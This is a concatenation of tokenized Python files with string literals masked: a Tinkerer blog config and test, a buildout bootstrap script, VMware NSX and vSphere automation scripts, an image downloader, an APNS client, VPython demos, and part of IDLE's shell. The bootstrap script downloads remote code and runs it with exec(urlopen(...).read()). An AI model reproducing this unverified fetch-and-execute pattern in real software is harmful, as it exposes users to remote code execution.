<s> import tinkerer <EOL> import tinkerer . paths <EOL> project = '<STR_LIT>' <EOL> tagline = '<STR_LIT>' <EOL> description = '<STR_LIT>' <EOL> author = '<STR_LIT>' <EOL> copyright = '<STR_LIT>' + author <EOL> website = '<STR_LIT>' <EOL> disqus_shortname = '<STR_LIT>' <EOL> html_favicon = '<STR_LIT>' <EOL> html_theme = '<STR_LIT>' <EOL> rss_service = '<STR_LIT>' <EOL> extensions = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> html_static_path = [ '<STR_LIT>' , tinkerer . paths . static ] <EOL> html_theme_path = [ tinkerer . paths . themes ] <EOL> exclude_patterns = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> doc_sidebar = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> html_sidebars = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : doc_sidebar , <EOL> '<STR_LIT>' : doc_sidebar , <EOL> '<STR_LIT>' : doc_sidebar , <EOL> '<STR_LIT>' : doc_sidebar , <EOL> '<STR_LIT>' : doc_sidebar , <EOL> '<STR_LIT>' : doc_sidebar , <EOL> '<STR_LIT>' : doc_sidebar , <EOL> '<STR_LIT>' : doc_sidebar , <EOL> } <EOL> source_suffix = tinkerer . source_suffix <EOL> master_doc = tinkerer . master_doc <EOL> version = tinkerer . __version__ <EOL> release = tinkerer . __version__ <EOL> html_title = project <EOL> html_use_index = False <EOL> html_show_sourcelink = False <EOL> html_add_permalinks = None </s>
<s> '''<STR_LIT>''' <EOL> import datetime <EOL> import os <EOL> from tinkerer import post <EOL> from tinkerer . ext import disqus <EOL> from tinkertest import utils <EOL> class TestDisqus ( utils . BaseTinkererTest ) : <EOL> def test_disqus ( self ) : <EOL> TEST_SHORTNAME = "<STR_LIT>" <EOL> utils . update_conf ( <EOL> { "<STR_LIT>" : <EOL> '<STR_LIT>' % TEST_SHORTNAME } ) <EOL> post . create ( "<STR_LIT>" , datetime . date ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:1> ) ) <EOL> POST_ID = "<STR_LIT>" <EOL> POST_LINK = "<STR_LIT>" + POST_ID + "<STR_LIT>" <EOL> self . build ( ) <EOL> output = os . path . join ( utils . TEST_ROOT , <EOL> "<STR_LIT>" , "<STR_LIT:html>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> output_html = open ( output , "<STR_LIT:r>" ) . read ( ) <EOL> self . assertTrue ( <EOL> disqus . create_thread ( TEST_SHORTNAME , POST_ID ) in output_html ) <EOL> output = os . path . join ( utils . TEST_ROOT , <EOL> "<STR_LIT>" , "<STR_LIT:html>" , "<STR_LIT>" ) <EOL> output_html = open ( output , "<STR_LIT:r>" ) . read ( ) <EOL> self . assertTrue ( <EOL> disqus . enable_count ( TEST_SHORTNAME ) in output_html ) <EOL> self . assertTrue ( <EOL> disqus . get_count ( POST_LINK , POST_ID ) in output_html ) </s>
<s> def pretty_tree ( x , kids , show ) : <EOL> """<STR_LIT>""" <EOL> ( MID , END , CONT , LAST , ROOT ) = ( u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:U+0020>' , u'<STR_LIT>' ) <EOL> def rec ( x , indent , sym ) : <EOL> line = indent + sym + show ( x ) <EOL> xs = kids ( x ) <EOL> if len ( xs ) == <NUM_LIT:0> : <EOL> return line <EOL> else : <EOL> if sym == MID : <EOL> next_indent = indent + CONT <EOL> elif sym == ROOT : <EOL> next_indent = indent + ROOT <EOL> else : <EOL> next_indent = indent + LAST <EOL> syms = [ MID ] * ( len ( xs ) - <NUM_LIT:1> ) + [ END ] <EOL> lines = [ rec ( x , next_indent , sym ) for x , sym in zip ( xs , syms ) ] <EOL> return u'<STR_LIT:\n>' . join ( [ line ] + lines ) <EOL> return rec ( x , u'<STR_LIT>' , ROOT ) </s>
<s> """<STR_LIT>""" <EOL> import os , shutil , sys , tempfile <EOL> from optparse import OptionParser <EOL> tmpeggs = tempfile . mkdtemp ( ) <EOL> usage = '''<STR_LIT>''' <EOL> parser = OptionParser ( usage = usage ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , <EOL> dest = '<STR_LIT>' , <EOL> action = "<STR_LIT:store_true>" , default = False , <EOL> help = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> parser . add_option ( "<STR_LIT:-c>" , "<STR_LIT>" , <EOL> help = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , <EOL> help = ( "<STR_LIT>" ) ) <EOL> options , args = parser . parse_args ( ) <EOL> to_reload = False <EOL> try : <EOL> import pkg_resources , setuptools <EOL> if not hasattr ( pkg_resources , '<STR_LIT>' ) : <EOL> to_reload = True <EOL> raise ImportError <EOL> except ImportError : <EOL> ez = { } <EOL> try : <EOL> from urllib . request import urlopen <EOL> except ImportError : <EOL> from urllib2 import urlopen <EOL> exec ( urlopen ( '<STR_LIT>' ) . read ( ) , ez ) <EOL> setup_args = dict ( to_dir = tmpeggs , download_delay = <NUM_LIT:0> , no_fake = True ) <EOL> ez [ '<STR_LIT>' ] ( ** setup_args ) <EOL> if to_reload : <EOL> reload ( pkg_resources ) <EOL> import pkg_resources <EOL> for path in sys . path : <EOL> if path not in pkg_resources . working_set . entries : <EOL> pkg_resources . working_set . add_entry ( path ) <EOL> ws = pkg_resources . working_set <EOL> cmd = [ sys . executable , '<STR_LIT:-c>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , tmpeggs ] <EOL> find_links = os . environ . get ( <EOL> '<STR_LIT>' , <EOL> options . find_links or <EOL> ( '<STR_LIT>' <EOL> if options . accept_buildout_test_releases else None ) <EOL> ) <EOL> if find_links : <EOL> cmd . extend ( [ '<STR_LIT>' , find_links ] ) <EOL> distribute_path = ws . find ( <EOL> pkg_resources . Requirement . parse ( '<STR_LIT>' ) ) . location <EOL> requirement = '<STR_LIT>' <EOL> version = options . version <EOL> if version is None and not options . accept_buildout_test_releases : <EOL> import setuptools . package_index <EOL> _final_parts = '<STR_LIT>' , '<STR_LIT>' <EOL> def _final_version ( parsed_version ) : <EOL> for part in parsed_version : <EOL> if ( part [ : <NUM_LIT:1> ] == '<STR_LIT:*>' ) and ( part not in _final_parts ) : <EOL> return False <EOL> return True <EOL> index = setuptools . package_index . PackageIndex ( <EOL> search_path = [ distribute_path ] ) <EOL> if find_links : <EOL> index . add_find_links ( ( find_links , ) ) <EOL> req = pkg_resources . Requirement . parse ( requirement ) <EOL> if index . obtain ( req ) is not None : <EOL> best = [ ] <EOL> bestv = None <EOL> for dist in index [ req . project_name ] : <EOL> distv = dist . parsed_version <EOL> if _final_version ( distv ) : <EOL> if bestv is None or distv > bestv : <EOL> best = [ dist ] <EOL> bestv = distv <EOL> elif distv == bestv : <EOL> best . append ( dist ) <EOL> if best : <EOL> best . sort ( ) <EOL> version = best [ - <NUM_LIT:1> ] . version <EOL> if version : <EOL> requirement = '<STR_LIT>' . join ( ( requirement , version ) ) <EOL> cmd . append ( requirement ) <EOL> import subprocess <EOL> if subprocess . call ( cmd , env = dict ( os . environ , PYTHONPATH = distribute_path ) ) != <NUM_LIT:0> : <EOL> raise Exception ( <EOL> "<STR_LIT>" , <EOL> repr ( cmd ) [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) <EOL> ws . add_entry ( tmpeggs ) <EOL> ws . require ( requirement ) <EOL> import zc . buildout . buildout <EOL> if not [ a for a in args if '<STR_LIT:=>' not in a ] : <EOL> args . append ( '<STR_LIT>' ) <EOL> if options . config_file is not None : <EOL> args [ <NUM_LIT:0> : <NUM_LIT:0> ] = [ '<STR_LIT:-c>' , options . config_file ] <EOL> zc . buildout . buildout . main ( args ) <EOL> shutil . rmtree ( tmpeggs ) </s>
<s> from tests . config import * <EOL> from nsxramlclient . client import NsxClient <EOL> __author__ = '<STR_LIT>' <EOL> def configure_nat ( session , edgeid = '<STR_LIT>' , oadd = '<STR_LIT>' , tadd = '<STR_LIT>' , oport = <NUM_LIT> , tport = <NUM_LIT> ) : <EOL> nat_spec = session . extract_resource_body_schema ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT> <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:action>' ] = '<STR_LIT>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = oadd <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = tadd <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:true>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:true>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:description>' ] = '<STR_LIT>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = oport <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = tport <EOL> create_response = session . update ( '<STR_LIT>' , uri_parameters = { '<STR_LIT>' : edgeid } , request_body_dict = nat_spec ) <EOL> session . view_response ( create_response ) <EOL> def append_nat ( session , edgeid = '<STR_LIT>' , oadd = '<STR_LIT>' , tadd = '<STR_LIT>' , oport = <NUM_LIT> , tport = <NUM_LIT> ) : <EOL> nat_spec = session . extract_resource_body_schema ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:action>' ] = '<STR_LIT>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = oadd <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = tadd <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:true>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:true>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:description>' ] = '<STR_LIT>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = oport <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = tport <EOL> create_response = session . create ( '<STR_LIT>' , uri_parameters = { '<STR_LIT>' : edgeid } , request_body_dict = nat_spec ) <EOL> session . view_response ( create_response ) <EOL> def update_nat ( session , rule_id , edgeid = '<STR_LIT>' , oadd = '<STR_LIT>' , tadd = '<STR_LIT>' , oport = <NUM_LIT> , tport = <NUM_LIT> ) : <EOL> nat_spec = session . extract_resource_body_schema ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT:action>' ] = '<STR_LIT>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] = oadd <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] = tadd <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:true>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:true>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT:description>' ] = '<STR_LIT>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] = oport <EOL> nat_spec [ '<STR_LIT>' ] [ '<STR_LIT>' ] = tport <EOL> create_response = session . update ( '<STR_LIT>' , uri_parameters = { '<STR_LIT>' : edgeid , '<STR_LIT>' : rule_id } , <EOL> request_body_dict = nat_spec ) <EOL> session . view_response ( create_response ) <EOL> def query_nat ( session , edgeid = '<STR_LIT>' ) : <EOL> response = session . read ( '<STR_LIT>' , uri_parameters = { '<STR_LIT>' : edgeid } ) <EOL> session . view_response ( response ) <EOL> def delete_nat ( session , edgeid = '<STR_LIT>' ) : <EOL> del_response = session . delete ( '<STR_LIT>' , uri_parameters = { '<STR_LIT>' : edgeid } ) <EOL> session . view_response ( del_response ) <EOL> def main ( ) : <EOL> session = NsxClient ( nsxraml_file , nsxmanager , nsx_username , nsx_password , debug = True ) <EOL> configure_nat ( session ) <EOL> append_nat ( session ) <EOL> query_nat ( session ) <EOL> rule_id = raw_input ( '<STR_LIT>' ) <EOL> update_nat ( session , rule_id ) <EOL> delete_nat ( session ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> import atexit <EOL> import hashlib <EOL> import json <EOL> import random <EOL> import time <EOL> import requests <EOL> from pyVim import connect <EOL> from pyVmomi import vim <EOL> from tools import cli <EOL> from tools import tasks <EOL> def get_args ( ) : <EOL> """<STR_LIT>""" <EOL> parser = cli . build_arg_parser ( ) <EOL> parser . add_argument ( '<STR_LIT:-c>' , '<STR_LIT>' , <EOL> type = int , <EOL> required = True , <EOL> action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> required = True , <EOL> action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> required = False , <EOL> action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> required = False , <EOL> action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> args = parser . parse_args ( ) <EOL> return cli . prompt_for_password ( args ) <EOL> def get_marvel_characters ( number_of_characters , marvel_public_key , <EOL> marvel_private_key ) : <EOL> """<STR_LIT>""" <EOL> timestamp = str ( int ( time . time ( ) ) ) <EOL> hash_value = hashlib . md5 ( timestamp + marvel_private_key + <EOL> marvel_public_key ) . hexdigest ( ) <EOL> characters = [ ] <EOL> for _num in xrange ( number_of_characters ) : <EOL> offset = random . randrange ( <NUM_LIT:1> , <NUM_LIT> ) <EOL> limit = '<STR_LIT:1>' <EOL> url = ( '<STR_LIT>' + <EOL> limit + '<STR_LIT>' + str ( offset ) + '<STR_LIT>' + <EOL> marvel_public_key + '<STR_LIT>' + timestamp + '<STR_LIT>' + hash_value ) <EOL> headers = { '<STR_LIT>' : '<STR_LIT:application/json>' } <EOL> request = requests . get ( url , headers = headers ) <EOL> data = json . loads ( request . content ) <EOL> if data . get ( '<STR_LIT:code>' ) == '<STR_LIT>' : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> character = data [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] . strip ( ) . replace ( '<STR_LIT:U+0020>' , <EOL> '<STR_LIT:_>' ) <EOL> characters . append ( character ) <EOL> return characters <EOL> def create_dummy_vm ( name , service_instance , vm_folder , resource_pool , <EOL> datastore ) : <EOL> """<STR_LIT>""" <EOL> vm_name = '<STR_LIT>' + name <EOL> datastore_path = '<STR_LIT:[>' + datastore + '<STR_LIT>' + vm_name <EOL> vmx_file = vim . vm . FileInfo ( logDirectory = None , <EOL> snapshotDirectory = None , <EOL> suspendDirectory = None , <EOL> vmPathName = datastore_path ) <EOL> config = vim . vm . ConfigSpec ( name = vm_name , memoryMB = <NUM_LIT> , numCPUs = <NUM_LIT:1> , <EOL> files = vmx_file , guestId = '<STR_LIT>' , <EOL> version = '<STR_LIT>' ) <EOL> print "<STR_LIT>" . format ( vm_name ) <EOL> task = vm_folder . CreateVM_Task ( config = config , pool = resource_pool ) <EOL> tasks . wait_for_tasks ( service_instance , [ task ] ) <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> args = get_args ( ) <EOL> if args . public_key_file : <EOL> with open ( args . public_key_file ) as key_file : <EOL> marvel_public_key = key_file . readline ( ) . strip ( ) <EOL> else : <EOL> marvel_public_key = raw_input ( '<STR_LIT>' ) . strip ( ) <EOL> if args . private_key_file : <EOL> with open ( args . private_key_file ) as key_file : <EOL> marvel_private_key = key_file . readline ( ) . strip ( ) <EOL> else : <EOL> marvel_private_key = raw_input ( '<STR_LIT>' ) . strip ( ) <EOL> service_instance = connect . SmartConnect ( host = args . host , <EOL> user = args . user , <EOL> pwd = args . password , <EOL> port = int ( args . port ) ) <EOL> if not service_instance : <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return - <NUM_LIT:1> <EOL> atexit . register ( connect . Disconnect , service_instance ) <EOL> content = service_instance . RetrieveContent ( ) <EOL> datacenter = content . rootFolder . childEntity [ <NUM_LIT:0> ] <EOL> vmfolder = datacenter . vmFolder <EOL> hosts = datacenter . hostFolder . childEntity <EOL> resource_pool = hosts [ <NUM_LIT:0> ] . resourcePool <EOL> print ( "<STR_LIT>" + str ( args . count ) + <EOL> "<STR_LIT>" ) <EOL> characters = get_marvel_characters ( args . count , <EOL> marvel_public_key , <EOL> marvel_private_key ) <EOL> for name in characters : <EOL> create_dummy_vm ( name , service_instance , vmfolder , resource_pool , <EOL> args . datastore ) <EOL> return <NUM_LIT:0> <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import atexit <EOL> from pyVim import connect <EOL> from tools import cli <EOL> def setup_args ( ) : <EOL> """<STR_LIT>""" <EOL> parser = cli . build_arg_parser ( ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , <EOL> required = True , <EOL> help = '<STR_LIT>' ) <EOL> my_args = parser . parse_args ( ) <EOL> return cli . prompt_for_password ( my_args ) <EOL> args = setup_args ( ) <EOL> si = None <EOL> try : <EOL> si = connect . SmartConnect ( host = args . host , <EOL> user = args . user , <EOL> pwd = args . password , <EOL> port = int ( args . port ) ) <EOL> atexit . register ( connect . Disconnect , si ) <EOL> except IOError as e : <EOL> pass <EOL> if not si : <EOL> raise SystemExit ( "<STR_LIT>" ) <EOL> vm = si . content . searchIndex . FindByUuid ( None , args . uuid , True , True ) <EOL> if not vm : <EOL> raise SystemExit ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" . format ( vm . name ) ) <EOL> print ( "<STR_LIT>" . format ( vm . runtime . powerState ) ) <EOL> vm . RebootGuest ( ) <EOL> print ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = "<STR_LIT>" <EOL> from pyVmomi import vim <EOL> vim . ManagedObject . id = property ( lambda self : self . _moId ) </s>
<s> allowGetSet = False <EOL> allowCapitalizedNames = False </s>
<s> import json <EOL> import logging <EOL> import os <EOL> from pathlib import Path <EOL> from urllib . request import urlopen , Request <EOL> logger = logging . getLogger ( __name__ ) <EOL> def get_links ( client_id ) : <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' . format ( client_id ) } <EOL> req = Request ( '<STR_LIT>' , headers = headers , method = '<STR_LIT:GET>' ) <EOL> with urlopen ( req ) as resp : <EOL> data = json . loads ( resp . read ( ) . decode ( '<STR_LIT:utf-8>' ) ) <EOL> return map ( lambda item : item [ '<STR_LIT>' ] , data [ '<STR_LIT:data>' ] ) <EOL> def download_link ( directory , link ) : <EOL> download_path = directory / os . path . basename ( link ) <EOL> with urlopen ( link ) as image , download_path . open ( '<STR_LIT:wb>' ) as f : <EOL> f . write ( image . read ( ) ) <EOL> logger . info ( '<STR_LIT>' , link ) <EOL> def setup_download_dir ( ) : <EOL> download_dir = Path ( '<STR_LIT>' ) <EOL> if not download_dir . exists ( ) : <EOL> download_dir . mkdir ( ) <EOL> return download_dir </s>
<s> from setuptools import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> packages = [ "<STR_LIT>" ] , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> zip_safe = False , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> ) </s>
<s> import logging <EOL> import time <EOL> from apns_proxy_client import APNSProxyClient <EOL> valid_token = "<STR_LIT>" <EOL> def main ( ) : <EOL> client = APNSProxyClient ( host = "<STR_LIT:localhost>" , port = <NUM_LIT> , application_id = "<STR_LIT>" ) <EOL> with client : <EOL> token = valid_token <EOL> i = <NUM_LIT:0> <EOL> interval = <NUM_LIT> <EOL> while i < <NUM_LIT:1000> : <EOL> i += <NUM_LIT:1> <EOL> client . send ( token , '<STR_LIT>' + str ( i ) , badge = i ) <EOL> print ( "<STR_LIT>" % i ) <EOL> if interval < <NUM_LIT:20> * <NUM_LIT> : <EOL> interval = int ( interval * <NUM_LIT> ) <EOL> time . sleep ( interval ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) <EOL> print ( "<STR_LIT>" ) </s>
<s> from visual import * <EOL> scene . height = scene . width = <NUM_LIT> <EOL> scene . center = ( <NUM_LIT> , - <NUM_LIT> , <NUM_LIT:0> ) <EOL> def spiral ( nloop = <NUM_LIT:1> , tightness = <NUM_LIT:1.0> , dir = <NUM_LIT:1.0> , scale = <NUM_LIT:1.0> ) : <EOL> spr = [ ] <EOL> scale = [ ] <EOL> clrs = [ ] <EOL> zd = <NUM_LIT> <EOL> for t in range ( <NUM_LIT:1> , <NUM_LIT> * nloop , <NUM_LIT:16> ) : <EOL> t *= <NUM_LIT> <EOL> x = tightness / <NUM_LIT> * t * math . cos ( t ) * dir <EOL> y = tightness / <NUM_LIT> * t * math . sin ( t ) <EOL> sc = sqrt ( x * x + y * y ) <EOL> z = t / <NUM_LIT> <EOL> spr . append ( ( x , y , z ) ) <EOL> clr = vector ( ( z * cos ( t ) , abs ( sin ( t ) ) , abs ( cos ( t * <NUM_LIT:2> ) ) ) ) . norm ( ) <EOL> clrs . append ( clr ) <EOL> scale . append ( ( sc , sc ) ) <EOL> return spr , scale , clrs <EOL> path , scale , clrs = spiral ( nloop = <NUM_LIT:2> , tightness = <NUM_LIT> ) <EOL> elps = shapes . circle ( radius = <NUM_LIT> , thickness = <NUM_LIT> ) <EOL> ee = extrusion ( frame = frame ( ) , shape = elps , pos = path , scale = scale , color = clrs , material = materials . marble ) <EOL> ee . frame . rotate ( angle = pi / <NUM_LIT:2> ) </s>
<s> from visual import * <EOL> G = <NUM_LIT> <EOL> giant = sphere ( pos = ( - <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ) , radius = <NUM_LIT> , color = color . red , <EOL> make_trail = True , interval = <NUM_LIT:10> ) <EOL> giant . mass = <NUM_LIT> <EOL> giant . p = vector ( <NUM_LIT:0> , <NUM_LIT:0> , - <NUM_LIT> ) * giant . mass <EOL> dwarf = sphere ( pos = ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ) , radius = <NUM_LIT> , color = color . yellow , <EOL> make_trail = True , interval = <NUM_LIT:10> ) <EOL> dwarf . mass = <NUM_LIT> <EOL> dwarf . p = - giant . p <EOL> dt = <NUM_LIT> <EOL> while True : <EOL> rate ( <NUM_LIT:200> ) <EOL> dist = dwarf . pos - giant . pos <EOL> force = G * giant . mass * dwarf . mass * dist / mag ( dist ) ** <NUM_LIT:3> <EOL> giant . p = giant . p + force * dt <EOL> dwarf . p = dwarf . p - force * dt <EOL> for star in [ giant , dwarf ] : <EOL> star . pos = star . pos + star . p / star . mass * dt </s>
<s> import os <EOL> import os . path <EOL> import sys <EOL> import string <EOL> import getopt <EOL> import re <EOL> import socket <EOL> import time <EOL> import threading <EOL> import traceback <EOL> import types <EOL> import subprocess <EOL> import macosxSupport <EOL> import linecache <EOL> from code import InteractiveInterpreter <EOL> try : <EOL> from Tkinter import * <EOL> except ImportError : <EOL> print >> sys . __stderr__ , "<STR_LIT>" "<STR_LIT>" <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> import tkMessageBox <EOL> from EditorWindow import EditorWindow , fixwordbreaks <EOL> from FileList import FileList <EOL> from ColorDelegator import ColorDelegator <EOL> from UndoDelegator import UndoDelegator <EOL> from OutputWindow import OutputWindow <EOL> from configHandler import idleConf <EOL> from utils import tb_print_list <EOL> import idlever <EOL> import rpc <EOL> import Debugger <EOL> import RemoteDebugger <EOL> IDENTCHARS = string . ascii_letters + string . digits + "<STR_LIT:_>" <EOL> HOST = '<STR_LIT:127.0.0.1>' <EOL> PORT = <NUM_LIT:0> <EOL> global warning_stream <EOL> warning_stream = sys . __stderr__ <EOL> try : <EOL> import warnings <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> def idle_showwarning ( message , category , filename , lineno , <EOL> file = None , line = None ) : <EOL> if file is None : <EOL> file = warning_stream <EOL> try : <EOL> file . write ( warnings . formatwarning ( message , category , filename , <EOL> lineno , file = file , line = line ) ) <EOL> except IOError : <EOL> pass <EOL> warnings . showwarning = idle_showwarning <EOL> def idle_formatwarning ( message , category , filename , lineno , line = None ) : <EOL> """<STR_LIT>""" <EOL> s = "<STR_LIT>" <EOL> s += '<STR_LIT>' % ( filename , lineno ) <EOL> if line is None : <EOL> line = linecache . getline ( filename , lineno ) <EOL> line = line . strip ( ) <EOL> if line : <EOL> s += "<STR_LIT>" % line <EOL> s += "<STR_LIT>" % ( category . __name__ , message ) <EOL> return s <EOL> warnings . formatwarning = idle_formatwarning <EOL> def extended_linecache_checkcache ( filename = None , <EOL> orig_checkcache = linecache . checkcache ) : <EOL> """<STR_LIT>""" <EOL> cache = linecache . cache <EOL> save = { } <EOL> for key in list ( cache ) : <EOL> if key [ : <NUM_LIT:1> ] + key [ - <NUM_LIT:1> : ] == '<STR_LIT>' : <EOL> save [ key ] = cache . pop ( key ) <EOL> orig_checkcache ( filename ) <EOL> cache . update ( save ) <EOL> linecache . checkcache = extended_linecache_checkcache <EOL> class PyShellEditorWindow ( EditorWindow ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , * args ) : <EOL> self . breakpoints = [ ] <EOL> EditorWindow . __init__ ( self , * args ) <EOL> self . text . bind ( "<STR_LIT>" , self . set_breakpoint_here ) <EOL> self . text . bind ( "<STR_LIT>" , self . clear_breakpoint_here ) <EOL> self . text . bind ( "<STR_LIT>" , self . flist . open_shell ) <EOL> self . breakpointPath = os . path . join ( idleConf . GetUserCfgDir ( ) , <EOL> '<STR_LIT>' ) <EOL> if self . io . filename : self . restore_file_breaks ( ) <EOL> def filename_changed_hook ( old_hook = self . io . filename_change_hook , <EOL> self = self ) : <EOL> self . restore_file_breaks ( ) <EOL> old_hook ( ) <EOL> self . io . set_filename_change_hook ( filename_changed_hook ) <EOL> rmenu_specs = [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( None , None , None ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , None ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , None ) <EOL> ] <EOL> def set_breakpoint ( self , lineno ) : <EOL> text = self . text <EOL> filename = self . io . filename <EOL> text . tag_add ( "<STR_LIT>" , "<STR_LIT>" % 